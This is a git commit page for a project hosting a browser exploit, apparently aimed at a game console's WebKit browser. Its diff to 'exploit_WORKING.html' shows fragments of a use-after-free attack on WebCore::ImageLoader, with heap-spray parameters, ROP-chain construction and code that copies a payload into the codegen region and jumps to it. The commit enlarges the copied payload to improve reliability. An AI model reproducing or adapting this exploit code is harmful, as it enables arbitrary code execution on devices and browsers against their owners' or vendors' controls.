Browse Source

better rate

Winbagility 1 year ago
parent
commit
4dafe1641a
2 changed files with 5 additions and 8 deletions
  1. 1
    5
      index.html
  2. 4
    3
      payload/exploit_WORKING.html

+ 1
- 5
index.html View File

@@ -5,11 +5,7 @@
5 5
 <div class="align">
6 6
 <a href="illuminati.mp4"><h1>Illuminati</h1></a><br/>
7 7
 <a href="diibugger.mp4"><h1>Diibugger</h1></a><br/>
8
+<a href="tcpgecko.mp4"><h1>TCPGecko</h1></a><br/>
8 9
 <a href="payload/exploit_WORKING.html"><h1>Exploit WORKING</h1></a><br/>
9 10
 <a href="payload/exploit.html"><h1>Exploit DEV</h1></a><br/>
10
-<br/>
11
-<br/>
12
-<br/>
13
-<br/>
14
-<a href="tcpgecko.mp4"><h1>TCPGecko</h1></a><br/>
15 11
 </div>

+ 4
- 3
payload/exploit_WORKING.html View File

@@ -17,6 +17,7 @@ function UaF(a)
17 17
     var sprayCount              = 0x1900;
18 18
     var _4K                     = 0x1000;
19 19
     var _16K                    = 0x4000;
20
+    var _32K                    = 0x8000;
20 21
     
21 22
     //radio is the *ONLY* type that left the freed WebCore::ImageLoader free !
22 23
     a.type="radio";
@@ -196,7 +197,7 @@ function UaF(a)
196 197
         ropgen_switchto_core1();
197 198
         
198 199
         //copy to payload to codegen
199
-        ropgen_copycodebin_to_codegen(codegenAddress, payloadAdress, _16K)
200
+        ropgen_copycodebin_to_codegen(codegenAddress, payloadAdress, _32K)
200 201
         
201 202
         //prepare payload argument
202 203
         payload_srcaddr = payloadAdress;
@@ -208,7 +209,7 @@ function UaF(a)
208 209
 	
209 210
         //Setup the code-loading ROP-chain which can be used by the loader-payload, since the above one isn't usable after execution due to being corrupted.
210 211
         ropchain_appendu32(0x0);
211
-        ropgen_copycodebin_to_codegen(codegenAddress, payloadAdress, _16K)
212
+        ropgen_copycodebin_to_codegen(codegenAddress, payloadAdress, _32K)
212 213
         ropgen_pop_r24_to_r31(ROP_OSFatal, ROP_Exit, ROP_OSDynLoad_Acquire, ROP_OSDynLoad_FindExport, ROP_os_snprintf, payload_srcaddr, 8, ROPHEAP);
213 214
     	ropchain_appendu32(codegenAddress);//Jump to the codegen area where the payload was written.        
214 215
     }
@@ -229,7 +230,7 @@ function UaF(a)
229 230
                               );
230 231
     }
231 232
     
232
-    alert("search");
233
+    //alert("wait...");
233 234
     
234 235
     //Use the new WebCore::ImageLoader & pivot !
235 236
     return 0;